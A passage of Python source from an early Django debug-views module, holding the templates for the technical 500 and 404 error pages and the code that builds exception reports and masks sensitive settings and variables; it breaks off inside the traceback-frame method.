#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>{% for t in loader.templates %}<li><code>{{ t.name }}</code> (File {% if t.exists %}exists{% else %}does not exist{% endif %})</li>{% endfor %}</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
| 38.324932 | 251 | 0.594307 | from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
# Any setting whose name contains one of these substrings is assumed to hold
# sensitive data and is masked in debug/error output (see cleanse_setting()).
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
# Placeholder shown in place of any cleansed setting or variable value.
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
    """Yield the start offset of every line in *template_source*.

    The first value is always 0; one offset is yielded just past each
    newline; the final value is ``len(template_source) + 1``, a sentinel
    end offset used by callers to delimit the last line.
    """
    yield 0
    for newline in re.finditer('\n', template_source):
        yield newline.end()
    yield len(template_source) + 1
def cleanse_setting(key, value):
    """Return a version of *value* that is safe to show in debug pages.

    If *key* matches HIDDEN_SETTINGS the whole value is replaced with
    CLEANSED_SUBSTITUTE; dict values are cleansed recursively, key by key.
    Cleansing is best-effort: a TypeError (e.g. a non-string key handed to
    the regex) leaves the value untouched.
    """
    try:
        if HIDDEN_SETTINGS.search(key):
            return CLEANSED_SUBSTITUTE
        if isinstance(value, dict):
            return dict((k, cleanse_setting(k, v)) for k, v in value.items())
        return value
    except TypeError:
        # Most likely a non-string key; show the value as-is.
        return value
def get_safe_settings():
    """Return a dict of the upper-case settings, sensitive values masked.

    Only names that are entirely upper-case (the Django settings
    convention) are included; each value is passed through
    cleanse_setting() before being exposed.
    """
    return dict(
        (name, cleanse_setting(name, getattr(settings, name)))
        for name in dir(settings)
        if name.isupper()
    )
def technical_500_response(request, exc_type, exc_value, tb):
    """Create a technical server error (500) response.

    *exc_type*, *exc_value* and *tb* are the triple from sys.exc_info().
    AJAX requests receive a plain-text traceback; all other requests get
    the full HTML debug page.
    """
    reporter = ExceptionReporter(request, exc_type, exc_value, tb)
    if request.is_ajax():
        body, content_type = reporter.get_traceback_text(), 'text/plain'
    else:
        body, content_type = reporter.get_traceback_html(), 'text/html'
    return HttpResponseServerError(body, content_type=content_type)
# Cache for the default exception reporter filter instance; populated
# lazily by get_exception_reporter_filter() on first use.
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
    """Return the exception reporter filter to use for *request*.

    A request may carry its own filter as
    ``request.exception_reporter_filter``; otherwise the class named by the
    DEFAULT_EXCEPTION_REPORTER_FILTER setting is instantiated once and
    cached at module level.
    """
    global default_exception_reporter_filter
    if default_exception_reporter_filter is None:
        # First use: import, instantiate and cache the configured default.
        filter_cls = import_by_path(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)
        default_exception_reporter_filter = filter_cls()
    if not request:
        return default_exception_reporter_filter
    return getattr(request, 'exception_reporter_filter',
                   default_exception_reporter_filter)
class ExceptionReporterFilter(object):
    """Base pass-through filter for exception reports.

    Performs no cleansing at all; subclasses override these hooks to hide
    sensitive request data and local variables.
    """

    def get_request_repr(self, request):
        """Return a printable representation of *request* for the report."""
        if request is None:
            return repr(None)
        return build_request_repr(
            request, POST_override=self.get_post_parameters(request))

    def get_post_parameters(self, request):
        """Return the POST data to display (unfiltered in this base class)."""
        return {} if request is None else request.POST

    def get_traceback_frame_variables(self, request, tb_frame):
        """Return (name, value) pairs for the frame's local variables."""
        return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
    """Exception reporter filter that hides sensitive data.

    When active (DEBUG is False, i.e. for emailed error reports), POST
    parameters and local variables that were marked sensitive via the
    @sensitive_post_parameters / @sensitive_variables decorators are
    replaced with CLEANSED_SUBSTITUTE.
    """

    def is_active(self, request):
        # Only cleanse when DEBUG is off; with DEBUG on, the developer is
        # assumed to be looking at their own data.
        return settings.DEBUG is False

    def get_post_parameters(self, request):
        """Return the POST data with sensitive parameters masked.

        ``request.sensitive_post_parameters`` is set by the
        @sensitive_post_parameters decorator and is either a list of
        parameter names or the string '__ALL__'.
        """
        if request is None:
            return {}
        else:
            sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
            if self.is_active(request) and sensitive_post_parameters:
                # Work on a copy; never mutate the request's own POST data.
                cleansed = request.POST.copy()
                if sensitive_post_parameters == '__ALL__':
                    # Cleanse all parameters.
                    for k, v in cleansed.items():
                        cleansed[k] = CLEANSED_SUBSTITUTE
                    return cleansed
                else:
                    # Cleanse only the specified parameters.
                    for param in sensitive_post_parameters:
                        if param in cleansed:
                            cleansed[param] = CLEANSED_SUBSTITUTE
                    return cleansed
            else:
                return request.POST

    def get_traceback_frame_variables(self, request, tb_frame):
        """Return the frame's (name, value) locals, cleansed as configured.

        Walks up the frame's callers looking for the wrapper frame created
        by the @sensitive_variables decorator to find which names must be
        masked for this frame.
        """
        # Loop through the frame's callers to find the frame of the
        # sensitive_variables decorator (if any) and read its configuration.
        current_frame = tb_frame.f_back
        sensitive_variables = None
        while current_frame is not None:
            if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
                and 'sensitive_variables_wrapper' in current_frame.f_locals):
                # The decorator stores the names to hide (or '__ALL__') as
                # an attribute on its wrapper function.
                wrapper = current_frame.f_locals['sensitive_variables_wrapper']
                sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
                break
            current_frame = current_frame.f_back
        cleansed = {}
        if self.is_active(request) and sensitive_variables:
            if sensitive_variables == '__ALL__':
                # Cleanse all variables
                for name, value in tb_frame.f_locals.items():
                    cleansed[name] = CLEANSED_SUBSTITUTE
            else:
                # Cleanse specified variables
                for name, value in tb_frame.f_locals.items():
                    if name in sensitive_variables:
                        value = CLEANSED_SUBSTITUTE
                    elif isinstance(value, HttpRequest):
                        # Cleanse the request's POST parameters.
                        value = self.get_request_repr(value)
                    cleansed[name] = value
        else:
            # Filter inactive (DEBUG=True) or nothing marked sensitive:
            # requests in the locals still get their POST data filtered.
            for name, value in tb_frame.f_locals.items():
                if isinstance(value, HttpRequest):
                    # Cleanse the request's POST parameters.
                    value = self.get_request_repr(value)
                cleansed[name] = value
        if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
            and 'sensitive_variables_wrapper' in tb_frame.f_locals):
            # This frame *is* the decorator's own wrapper frame: mask its
            # captured func_args/func_kwargs, which hold the wrapped call's
            # (potentially sensitive) arguments.
            cleansed['func_args'] = CLEANSED_SUBSTITUTE
            cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
        return cleansed.items()
class ExceptionReporter(object):
    """Organize and coordinate reporting on exceptions.

    Gathers the traceback, per-frame source context, template debug
    information and request/settings data, then renders it either as the
    HTML debug page or as plain text (for AJAX requests and emailed
    reports).
    """

    def __init__(self, request, exc_type, exc_value, tb, is_email=False):
        # exc_type/exc_value/tb are the triple from sys.exc_info();
        # is_email selects the emailed-report variant of the templates.
        self.request = request
        self.filter = get_exception_reporter_filter(self.request)
        self.exc_type = exc_type
        self.exc_value = exc_value
        self.tb = tb
        self.is_email = is_email
        self.template_info = None
        self.template_does_not_exist = False
        self.loader_debug_info = None
        # Handle deprecated string exceptions: wrap the bare string in a
        # real Exception so the rest of the reporter can treat it uniformly.
        if isinstance(self.exc_type, six.string_types):
            self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
            self.exc_type = type(self.exc_value)

    def get_traceback_data(self):
        """Return a dictionary containing traceback information.

        This is the template context for both the HTML and the plain-text
        500 templates.
        """
        if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
            from django.template.loader import template_source_loaders
            self.template_does_not_exist = True
            self.loader_debug_info = []
            # Record, per loader, which template files were tried and
            # whether each exists on disk.
            for loader in template_source_loaders:
                try:
                    source_list_func = loader.get_template_sources
                    # NOTE: This assumes exc_value is the name of the
                    # template that the loader attempted to load.
                    template_list = [{'name': t, 'exists': os.path.exists(t)} \
                        for t in source_list_func(str(self.exc_value))]
                except AttributeError:
                    template_list = []
                loader_name = loader.__module__ + '.' + loader.__class__.__name__
                self.loader_debug_info.append({
                    'loader': loader_name,
                    'templates': template_list,
                })
        if (settings.TEMPLATE_DEBUG and
            hasattr(self.exc_value, 'django_template_source')):
            self.get_template_exception_info()
        frames = self.get_traceback_frames()
        for i, frame in enumerate(frames):
            if 'vars' in frame:
                # Pretty-print and HTML-escape each local variable's value.
                frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
            frames[i] = frame
        unicode_hint = ''
        if self.exc_type and issubclass(self.exc_type, UnicodeError):
            start = getattr(self.exc_value, 'start', None)
            end = getattr(self.exc_value, 'end', None)
            if start is not None and end is not None:
                # Show a small window of text around the offending range.
                unicode_str = self.exc_value.args[1]
                unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
        from django import get_version
        c = {
            'is_email': self.is_email,
            'unicode_hint': unicode_hint,
            'frames': frames,
            'request': self.request,
            'filtered_POST': self.filter.get_post_parameters(self.request),
            'settings': get_safe_settings(),
            'sys_executable': sys.executable,
            'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
            'server_time': datetime.datetime.now(),
            'django_version_info': get_version(),
            'sys_path' : sys.path,
            'template_info': self.template_info,
            'template_does_not_exist': self.template_does_not_exist,
            'loader_debug_info': self.loader_debug_info,
        }
        # Check whether exception info is available
        if self.exc_type:
            c['exception_type'] = self.exc_type.__name__
        if self.exc_value:
            c['exception_value'] = smart_text(self.exc_value, errors='replace')
        if frames:
            c['lastframe'] = frames[-1]
        return c

    def get_traceback_html(self):
        """Return HTML version of debug 500 HTTP error page."""
        t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
        c = Context(self.get_traceback_data())
        return t.render(c)

    def get_traceback_text(self):
        """Return plain text version of debug 500 HTTP error page."""
        t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
        # autoescape=False: the output is text/plain, not HTML.
        c = Context(self.get_traceback_data(), autoescape=False)
        return t.render(c)

    def get_template_exception_info(self):
        """Populate self.template_info from the failing template's source.

        ``django_template_source`` is (origin, (start, end)): the template
        origin plus the character range of the node that raised.
        """
        origin, (start, end) = self.exc_value.django_template_source
        template_source = origin.reload()
        context_lines = 10
        line = 0
        upto = 0
        source_lines = []
        before = during = after = ""
        # Walk line-start offsets; the line containing [start, end) is
        # split into before/during/after fragments for highlighting.
        for num, next in enumerate(linebreak_iter(template_source)):
            if start >= upto and end <= next:
                line = num
                before = escape(template_source[upto:start])
                during = escape(template_source[start:end])
                after = escape(template_source[end:next])
            source_lines.append( (num, escape(template_source[upto:next])) )
            upto = next
        total = len(source_lines)
        top = max(1, line - context_lines)
        bottom = min(total, line + 1 + context_lines)
        # In some rare cases, exc_value.args might be empty.
        try:
            message = self.exc_value.args[0]
        except IndexError:
            message = '(Could not get exception message)'
        self.template_info = {
            'message': message,
            'source_lines': source_lines[top:bottom],
            'before': before,
            'during': during,
            'after': after,
            'top': top,
            'bottom': bottom,
            'total': total,
            'line': line,
            'name': origin.name,
        }

    def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
        """Return context_lines of source before and after *lineno*.

        Returns (pre_context_lineno, pre_context, context_line,
        post_context), or (None, [], None, []) when the source cannot be
        read.  The source comes from the module loader when it supports
        get_source(), otherwise from the file on disk.
        """
        source = None
        if loader is not None and hasattr(loader, "get_source"):
            source = loader.get_source(module_name)
            if source is not None:
                source = source.splitlines()
        if source is None:
            try:
                with open(filename, 'rb') as fp:
                    source = fp.readlines()
            except (OSError, IOError):
                pass
        if source is None:
            return None, [], None, []
        # If we just read the source from a file, or if the loader did not
        # apply tokenize.detect_encoding to decode the source into a Unicode
        # string, then we should do that ourselves.
        if isinstance(source[0], six.binary_type):
            encoding = 'ascii'
            for line in source[:2]:
                # File coding may be specified. Match pattern from PEP-263
                # (http://www.python.org/dev/peps/pep-0263/)
                match = re.search(br'coding[:=]\s*([-\w.]+)', line)
                if match:
                    encoding = match.group(1).decode('ascii')
                    break
            source = [six.text_type(sline, encoding, 'replace') for sline in source]
        lower_bound = max(0, lineno - context_lines)
        upper_bound = lineno + context_lines
        pre_context = [line.strip('\n') for line in source[lower_bound:lineno]]
        context_line = source[lineno].strip('\n')
        post_context = [line.strip('\n') for line in source[lineno+1:upper_bound]]
        return lower_bound, pre_context, context_line, post_context

    def get_traceback_frames(self):
        """Return a list of dicts, one per traceback frame, with source
        context and (filtered) local variables for each frame."""
        frames = []
        tb = self.tb
        while tb is not None:
